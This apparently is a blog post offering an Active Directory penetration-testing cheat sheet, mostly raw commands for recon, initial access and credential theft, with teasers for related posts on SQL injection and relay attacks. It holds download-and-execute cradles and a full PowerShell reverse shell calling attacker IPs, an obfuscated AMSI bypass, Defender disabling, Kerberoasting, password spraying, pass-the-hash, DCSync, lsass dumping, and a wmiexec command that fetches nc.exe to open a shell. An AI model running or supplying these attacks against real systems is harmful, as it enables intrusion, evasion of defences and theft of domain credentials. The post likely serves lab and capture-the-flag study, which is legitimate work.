Skip to main content

AD PenTest - Recon and Initial Access

By

Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info

 check for Non-windows processes in windows using netstat

Step 1: Check net user and admin and user rights

Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1.

Step 3: Try to get Meterpreter.

Step 4: Load mimikatz,try bypass UAC, check SAM SYSTEM etc.

Step 5: check for weird programs and registry.

Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce  Atacking AD with LDAP & kerberos  
 
Step 7: Got Creds - try psexec.py or crackmapexec - cheatsheet

 

Download rev Shells on the target 

#download and execute the script 
powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.10/powerrev.ps1')

#Run the shell in memory 
powershell.exe iex(invoke-webrequest("http://10.10.10.10:8001/powerrev.ps1") -UseBasicParsing))

powershell.exe iex(iwr(http://10.10.10.10:8001/powerrev.ps1) -usebasicparsing)

#download the rev shell on the target and save it 
powershell.exe Invoke-WebRequest http://10.10.10.10/powerrev.ps1 -OutFile c:\temp\powerrev.ps1
powershell.exe c:\temp\powerrev.ps1

#Another way of downloading a file 
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"

# Download and execute Automatically
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - 

#Powershell V3
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') 


$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd() 


More Info from Hacktrcks.xyz
Powershell Revere Shells

powershell -nop -c $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',5985);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

try the shell from this link
Local user Enum Using Net user 

whoami /priv

whoami /groups

net user UserName /domain

net localgroup "Remote Management Users"
Basic AD Enum After Initial Access using AD Module

#Get Domain Details
$ADClass = [System.DirectoryServices.ActiveDirectory.Domain]
$ADclass::GetCurrentDomain()

#Loading AD Modules
Import-Module Microsoft.ActiveDirectory.Management.dll -Verbose
Import-Module ActiveDirectory.psd1 -Verbose

User Enumeration

#View all users in Domain
get-aduser

#View all user properties
get-aduser -Identity kyomah -Properties *

#ALL user Objects
Get-ADUser -Filter * -Properties * |select -First 1 | Get-Member -MemberType *Property | select Name

#Find Last Password set date
Get-ADUser -Filter * -Properties * |select name, @{expression={[datetime]::fromFileTime($_pwdlsatset)}}	

#View Account Descriptions to check for stored passwords
Get-ADUser -Filter 'Description -like "*pass*"' -Properties Description | select name,Description

#Finding user accounts used as Service accounts 
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName


Computer Enumeration

#view all computer names 
Get-ADComputer -Filter * | select name

#Find Windows 2012 Servers 
Get-ADComputer -Filter 'OperatingSystem -like "*2019*"' -Properties OperatingSystem | select Name,OperatingSystem

#Check if machines is online/pingable
Get-ADComputer -Filter * -Properties DNSHostName |%{Test-Connection -Count 1 -ComputerName $_.DNSHostName}

User Groups Enumeration

#Find all groups in the Domain
Get-ADGroup  -Filter * |select name

#Get verbose info about groups 
Get-ADGroup  -Filter * -Properties *

#Find Complete info about specific group
Get-ADGroup -Identity 'Enterprise Admins' -Properties *
Get-ADGroup -Filter 'Name -like "*admin*"'| select Name 

Group Membership Enum

#Find the members of a group
Get-ADGroupMember -Identity 'Enterprise Admins' -Recursive | select SamAccountName

#Find the groups a user is member of
Get-ADPrincipalGroupMembership -Identity UserName | select name

GPO Enumeration:

#Get GPO list in current domain
Get-gpo -all

#Restricted policy
Get-NetGPOGroup

#Finding OUS
Get-ADOrganizationalUnit -Filter * -Properties *

Forest Enumeration

#Domain Trust Mapping
Get-ADTrust -Identity steins.local

#Forest Details
Get-ADForest
Get-AdForest -Identity Steins.local

#Get all domains in current forest
(Get-ADForest).Domains

#Get all Global catalogs for current forest
Get-ADForest | select  -ExpandProperty GlobalCatalogs

#Map Trusts of Forests
Get-ADTrust -Filter 'msDS-TrustForestTrustinfo -ne "$null"'



Basic AD Enum After Initial Access using PowerView

powershell.exe -ep bypass
Import-Module ./PowerView.ps1

#View all the computers in the domain
Get-DomainComputer | Select name

#List the users in the domain 
Get-DomainUser

#View all the shares of the comupters
Find-DomainShare
Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC
Get-NetfileServer --help

#List all groups on a machine: 
Get-netlocalgroup -ComputerName steinsdc -ListGroups

#Find Computers where Domain admin (user/group) has sessions
Invoke-UserHunter -GroupName "RDPUsers"

#Find Computers where domain admin is logged in
Invoke-UserHunter -Stealth

#Finding user accounts used as Service accounts
Get-NetUser -SPN 
Finding machines with local admin access

incase SMB is disbaled, you can run the below  https://jdhitsolutions.com/blog/wp-content/uploads/2011/07/get-wmiadmin.txt --> import the script


Find-WMILocalAdminAccess -ComputerFile ./computers.txt -Verbose 

Find-WMILocalAdminAccess -ComputerName starkt

Ldap Enumeration:

ldapsearch -x -h 10.10.10.10 -s base namingcontexts 

ldapsearch -x -h forest.htb.local -s sub -b 'DC=HTB,DC=LOCAL' | tee ldap_dump.txt


Dumping passwords using LDAP:

ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

ldapsearch -x -h 10.10.10.254 -D <<username>> -w <<password>> -b "dc=AJLAB,dc=COM" "(ms-MCS-AdmPwd=*)" ms-MSC-AdmPwd
Domain Enumeration with RPcclient

#Enum using Null Session
rpcclient -U "" 10.10.10.10

#Login as a user
rpcclient -U USERNAME //10.10.10.10

#Find Users in the domain 
rpcclient -Uuser_Name%PASSWORD -c enumdomusers 10.10.10.10

#Find Domian Info
rpcclient -Uuser_Name%PASSWORD -c querydominfo  10.10.10.10

#Find Groups and their Alias
rpcclient -Uuser_Name%PASSWORD -c "enumalsgroups builtin" 10.10.10.10

#Find more info using Alias and note SIDs
rpcclient -Uuser_Name%PASSWORD -c "queryaliasmem builtin 0x244" 10.10.10.10

#Find more info using SIDs
rpcclient $> lookupsids S-1-5-21-586154515854-343543654-8743952433-1105 

#Reset other Users Password
rpcclient -U user1 //10.10.10.10
setuserinfo2 USER2 23 'PASSWORD'

Enum using RPCClient

rpcclient -U DOMAIN\\Username 10.10.10.10   #Enter pass 

enumdomusers     #Enumerate Domain Users 

lookupnames username   #Get user S-ID

queryuser user_id #Example queryuser 0x1f2

querydispinfo      #Display users info
 
enumprivs        #Enum Privileges

enumprinters    #Enum Printers
Creds Sniffing when SMB Signing is not required/ Disbaled 

responder -I tun0 -F --lm -d -w -i KALI_IP

net use \\10.10.14.239    #on target machine 

or 

Access SMB 

OR 
responder -I tun0 -rPv 

#NTLMv2 Hash
hashcat -m 5600 hash ~/Downloads/rockyou.txt --force -r  /usr/share/hashcat/rules/d3ad0ne.rule

Find users with SPN's set to their Accounts

#import the module and Find the users 
Import-Module .\GetUserSPNs.ps1

or 
#AD module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

or 
#Poweview
Get-NetUser -SPN 

#request the users ticket
powershell.exe -exec bypass -c "Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'SPNNAME/hostname.steins.LOCAL:1433' "

Import-Module .\Invoke-Kerberoast.ps1

#Generate the hash
Invoke-Kerberoast -OutputFormat Hashcat 

#Cracking the hash
hashcat -m 13100 -a 0 ticket.hashcat /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/T0XlC-insert_space_and_special_0_F.rule  --force

or 

hashcat -a 0 -m 13100 ticket.hashcat /usr/share/wordlists/rockyou.txt -r/usr/share/hashcat/rules/d3ad0ne.rule --force

or 

hashcat -a 0 -m 13100 hash ~/Downloads/Tools/rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --force 

List the users with SPN Set

sudo GetUserSPNs.py -request -dc-ip 10.10.10.10 Steins.local/mark 

GetUserSPNs.py -request -dc-ip 10.10.10.10 Steins.local/mark  -outputfile hashes.txt -k 


You can Review the Errors here: KRB_AP_ERR_BAD_INTEGRITY 
The authenticator was encrypted with something other than the session key. The result is that the client cannot decrypt the resulting message. The modification of the message could be the result of an attack or it could be because of network noise.

#Create ccache file 
getTGT.py -dc-ip 10.10.10.10 Steins.local/mark
export KRB5CCNAME=mark.ccache

Brute Forcing Kerberos

kerbrute userenum --dc 10.10.10.10 -d steins.local users.txt 

Download Kerbrute from here
kerbrute userenum --domain htb.local /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.10  
ASREP Roast: Get users hash from a DoNotPre-Auth user

sudo GetNPUsers.py STEINS-DC.LOCAL/ -usersfile users.txt -outputfile hashes.txt -dc-ip 10.10.10.10

sudo john hash --format=krb5asrep --wordlist=rockyou.txt 
# better copy rockyou.txt to the same location  
ASREP Roast as an Authenticated user

python3 GetNPUsers.py steins.local/user:"password!" -dc-ip 10.10.10.10 -request 
Updating Time to Match DC - KRB_AP_ERR_SKEW(Clock skew too great)

#Display the time of the server 
proxychains net time -S 10.10.10.10

or 

#Get DC time from curl response headers 
proxychains curl DC_IP:5985 -v 

sudo date -s "Thu Dec 24 10.10.10.10"
Kerberoasting

.\Rubeus.exe kerberoast /domain:steins.local /user:username/format:hashcat /outfile:hash.txt

hashcat -m 13100 krb5t_hash /home/kali/Downloads/Tools/rockyou.txt --force  
Kerberoast:
 
Save the TGS to the disk and brute force it :P. DC identifies the service account by ServicePrincipalName  but service accounts password are freaking hard to crack in most of the cases.  


Finding user accounts used as Service accounts: List SPNs

Poweview: Get-NetUser -SPN 
AD: Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName


Request a Ticket: TGS: Take the SPN Name from above command

#AD Module - get TGS
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosReceiverSecurityToken -ArgumentList "SPN_NAME/Steins.local"

#Check tokens and confirm the TGS
klist		

#Saves the tickets from memory to DISK
Invoke-Mimikatz -Command '"Kerberos::list /export"'		

#PowerView: supports JTR & hashcat
Request-SPNTicket			

Old way to cracking kerberos password
python tgscrack.py wordlist.txt hash_fileName


OR

# Requesting TGS (Ticket Granting Service)
GetUserSPNs.py steins.local/kyomah:Welcome@1 -dc-ip 192.168.227.144 -request			

#Cracking Kerberos 5 TGS using hashcat
hashcat -m 13100 krb5t_hash /home/kali/Downloads/Tools/rockyou.txt --force  
Targeted Kerberosting - AS-REPs

powerview.ps1 Get-DomainUser -PreauthNotRequired -Verbose

Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuths


OR CHECK FOR users on which we can modify ACL
---------------------------------------------- Searching for GenericAll Rights

#Finding Users with enough persmissions to modify acls
powerview_dev.ps1 Invoke-ACLScanner -ResolveGUIds | {$_.IdentityReferenceName -match "RDPUsers"}

#Changing the ACL of the user: Disabling PreAuth for Kerberos
Powerview.exe Set-DomainObject -Identity USER_NAME -XOR @{useraccountcontrol=4194304} -Verbose

#Now we should be able to view users for preatuth is required:
Powerview.exe Get-DomainUser -PreAuthNotRequired -Verbose

#Requesting AS-REP for offline bruteforcing:
https://raw.githubusercontent.com/HarmJ0y/ASREPRoast/master/ASREPRoast.ps1 (Depricated)
Get-ASREPhash -Username USER_NAME -Verbose		

OR
#use Asreproast to get the hash of the user account, remove all the spaces from the hash before bruteforcing 
https://github.com/GhostPack/Rubeus#asreproast
Rubeus.exe asreproast /user:TestOU3user
OR
Rubeus.exe asreproast /user:Administrator /format:hashcat /outfile:hash.txt

#Copy the hash and crack it using JTR  hashcat
john krbhash --wordlist=wordlist.txt 

#Cracking using Hashcat; add $23 after $krb5asrep if you do not export the hash as hashcat format
hashcat -m18200 hash -a 3 rockyou.txt
hashcat -m18200 hash rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule --force 
Abusing Kerberos with users who doenst have SPNs
------------------------------------------------- Set SPN for the user and request TGS

#searching for users with GenericAll Permissions Set
powerview.exe Invoke-ACLScanner -ResolveGUIds | {$_.IdentityReferenceName -match "RDPUsers"}

#Find the user who doesnt have SPN set already using AD module: 
Get-ADUser -Identity USER_Name -Properties ServicePrincipalName | Select ServicePrincipalName

#Set a SPN for the User (Must be Unique for the domain)
powerview.exe Set-DomainObject -Identity USER_NAME -Set @{serviceprincialName = 'DomainName/SomeUniqueName'}
AD: Set-ADUser -Identity USER_NAME -ServicePrincipalNames @{Add='DomainName/SomeUniqueName'}

#Now if you check you should see SPN Set to the username
Get-ADUser -Identity USER_Name -Properties ServicePrincipalName | Select ServicePrincipalName

Now request a TGS:
---------------------
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosReceiverSecurityToken -ArgumentList DomainName/SomeUniqueName"

#check the TGS for DomainName/SomeUniqueName
klist	

#Export the tickets
Invoke-Mimikatz -Command '"kerberos::list /export"'

#Crack the TGS
python tgscrack.py wordlist.txt hash_fileName

Log generated is 4769

BloodHound-Python
If you have access to DC, need admin creds - Github

Linux:

proxychains python3 bloodhound.py -d Steins.local -u admin -p p@$$W0rd! -c all -dc dc.steins.local -gc dc.steins.local -v -ns 10.10.10.10 --dns-tcp 

Few files will appear in the same location, import them into bloodhound 

Kali: apt-get install bloodhound 
sudo neo4j console
go to localhost:7474
neo4j: neo4j 	#login in browser and change the password 

bloodhound   #bloodhoun login will pop-up, login with new creds

Windows:

Download this on Windows target: SharpHound.ps1

powershell -ep bypass 
..\SharpHound.ps1
invoke-Bloodhound -CollectionMethod All -Domain Steins.local -ZipfileName file.zip

invoke-Bloodhound -CollectionMethod LoggedOn -Verbose

or 

SharpHound.exe -c All -d Steins.local --zipfilename test.zip

OR 

.\SharpHound.exe  -d steins.local --domaincontroller 192.168.168.168 --ldapusername admin  --ldappassword P@$$W0rd! --zipfilename domain.zip - c All

open the file in bloodhound --> click on upload --> select file


For Testing: 
git clone https://github.com/BloodHoundAD/BloodHound-Tools
cd DBCreator
pip install neo4j-driver
sudo pip3 install neo4j
python3 DBCreator.py
sudo neo4j console 
dbconfig
Access other user's share 

net use \\DC.STEINS.LOCAL\c$ /u:STEINS.LOCAL\admin 'P@$$W0rd!' 

or 


$SecPassword = ConvertTo-SecureString 'ADMIN_PASSWORD' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Domain\Admin_Username', $SecPassword)


invoke-command -computername dc -scriptblock { dir C:\users\username\desktop } -credential $cred
Add a user to another group

Powerview:

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred

Windows:
net group "Remote Admin Permissions" USERNAME /add /domain
Disable AntiVirus/ Windows Defender

Set-MpPreference -DisableRealtimeMonitoring $true
Diasble AMSI 

sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
Adding DoNotPre-Auth on target user

works only after logging in

Set-ADAccountControl -Identity jorden -doesnotrequirepreauth $true
Password Spraying 

Import-Module PowerView.ps1

#list all domain users and save them to a text file 
PowerShell Get-DomainUser | select samaccountname

Import-Module DomainPasswordSpray.ps1

Invoke-DomainPasswordSpray -UserList users.txt -Password 'P@$$W0rd!' -OutFile sprayed-creds.txt

or 


proxychains crackmapexec  smb 10.10.10.10 -d steins.local -u users.txt -p 'p@$$w0rd1' --continue-on-success
Get User Account Details 

net user UserName /domain

or 

PowerShell Get-DomainUser UserName
Open a Shell using creds: if Port 5985 is open

sudo evil-winrm -u USERNAME -p PASSWORD -i 10.10.10.10

or 

evil-winrm -u username -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.10


or 

 psexec.py USERNAME@10.10.10.10

or 

sudo secretsdump.py USERNAME@10.10.10.10

OR  login to the machine and 

./mimikatz.exe "lsadump::dcsync /user:Administrator" "exit";

or 
evil-winrm -i 10.10.10.10 -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

or 
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 steins.local/administrator@10.10.10.10

or 


.\SharpDPAPI.exe machinecredentials

psexec.py Administrator@10.10.10.10 -hashes LMHASH:NTHASH
Cracking Passwords using ntds & system hive

secretsdump.py -ntds ntds.dit -system system.bak LOCAL

#login as Admin using the hash 
evil-winrm -H 9658dsa3t1d9250115e2205d9f48400d -u administrator -i 10.10.10.10

#For Clear Text Password
lsassy -d steins.local -u Administrator -H 9658dsa3t1d9250115e2205d9f48400d 10.10.10.10 -m 0 --procdump procdump.exe --dumpert dumpert.exe 

#Download the hashes dump
secretsdump.py -just-dc-ntlm STEINS.LOCAL/administrator:"Password!"@10.10.10.10 -use-vss
Dumping Creds if you find lsass.dmp

mimikatz.exe
sekurlsa::minidump lsass.DMP
sekurlsa::logonPasswords full
Writable Directories 
save exploits in below directories. 

C:\Windows\System32\spool\drivers\color\
Running a Powershell Script on Target Machine 

http://website.com/cmd.php?cmd=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.33/pu.ps1')| powershell -noprofile - 
RCE using wmiexec

proxychains wmiexec.py -debug -nooutput domain/username:'password'@TARGET_ip "powershell.exe Invoke-WebRequest -Uri 'http://KALI_ip/nc.exe' -OutFile 'C:\Windows\System32\spool\drivers\color\nc.exe'; cmd.exe /c C:\Windows\System32\spool\drivers\color\nc.exe -e cmd.exe KALI_IP 9001"
Port Scan a Target Machine 

Download Invoke-PortScan from here

PowerShell Invoke-Portscan -Hosts 172.16.249.1/24 -Ports 22 -Threads 30
| Where { $_.Alive -eq "True" }
Enumerating AD Recycle Bin Group

Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects

#Now check for users passwords. might come in handy sometimes
Get-ADObject -filter { SAMAccountName -eq "UserName" } -includeDeletedObjects -property *









Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more